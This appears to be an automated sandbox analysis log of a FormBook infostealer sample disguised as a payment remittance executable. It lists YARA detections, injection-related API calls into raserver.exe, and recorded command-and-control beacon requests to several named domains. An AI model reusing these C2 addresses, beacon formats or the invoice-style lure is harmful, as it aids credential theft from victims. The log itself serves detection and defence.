Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/0O
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/;O$dh
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/HO
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213811208.0000000005F2D000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/It
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/VO
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214195042.0000000005F2D000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0nl
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/eOndo
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213925578.0000000005F2D000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/0O
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/lOyd
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213925578.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/lOyd
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214195042.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213811208.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ty
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213284821.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.micro(D.df
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr2K
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr8
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212459989.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krQK
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213130693.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213161728.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnrsCI
          Source: raserver.exe, 00000013.00000002.479062532.0000000004DE2000.00000004.00020000.sdmp String found in binary or memory: https://www.johnharrisagent.com/uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7
          Source: unknown DNS traffic detected: queries for: www.yummyblockparty.com
          Source: global traffic HTTP traffic detected: GET /uytf/?4hax=Z6tv0ZGri8uWurB8AUDeWgq8Hn78EURDlDEEMIHUNMQGUG9NVGnXX5+ZYyjQXpOA0JMU&6lE=xT6Pc HTTP/1.1 Host: www.yummyblockparty.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7DtpN0+eCTBT&6lE=xT6Pc HTTP/1.1 Host: www.johnharrisagent.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /uytf/?4hax=Lw8pQUl/qe2gQHW8JEklnfX9vlL4ErZAhlphDfsrttl8uYXfrtRE5waSCzthMEOsFHNR&6lE=xT6Pc HTTP/1.1 Host: www.itsready.support Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /uytf/?4hax=0R01lDMz+xXIWoinSyO5qQyNMJHeVacFioz47MHPNe7DMd9wx+TtySfTu0uIVXra7tyR&6lE=xT6Pc HTTP/1.1 Host: www.btt5204.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.225993143.0000000000BBB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match File source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample Static PE information: Filename: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          .NET source code contains very large strings
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, ConsoleGame/Form1.cs Long String: Length: 50988
          Source: 1.0.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.3c0000.0.unpack, ConsoleGame/Form1.cs Long String: Length: 50988
          Source: 1.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.3c0000.0.unpack, ConsoleGame/Form1.cs Long String: Length: 50988
          Source: 5.0.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.8a0000.0.unpack, ConsoleGame/Form1.cs Long String: Length: 50988
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.8a0000.1.unpack, ConsoleGame/Form1.cs Long String: Length: 50988
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 0475B150 appears 72 times
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Code function: 5_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Code function: 5_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Code function: 5_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Code function: 5_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Code function: 5_2_0041868A NtReadFile,
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Code function: 5_2_0041870A NtClose,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_047995D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_047996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_047996D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_047999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_0479AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_047995F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_0479A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_0479A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_047997A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_0479B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_047998F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_047998A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_047999D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_04799B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_0479A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_007185E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_00718690 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_00718710 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exe Code function: 19_2_007187C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071868A NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071870A NtClose,
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Binary or memory string: OriginalFilename vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.225335486.00000000003C2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSerializationHeaderReco.exe8 vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.225993143.0000000000BBB000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameEnvoySinks.dll6 vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.302006215.0000000000F94000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameraserver.exej% vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.303502359.000000000163F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.301350548.00000000008A2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSerializationHeaderReco.exe8 vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Binary or memory string: OriginalFilenameSerializationHeaderReco.exe8 vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Virustotal: Detection: 28%
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe File read: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe:Zone.Identifier
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
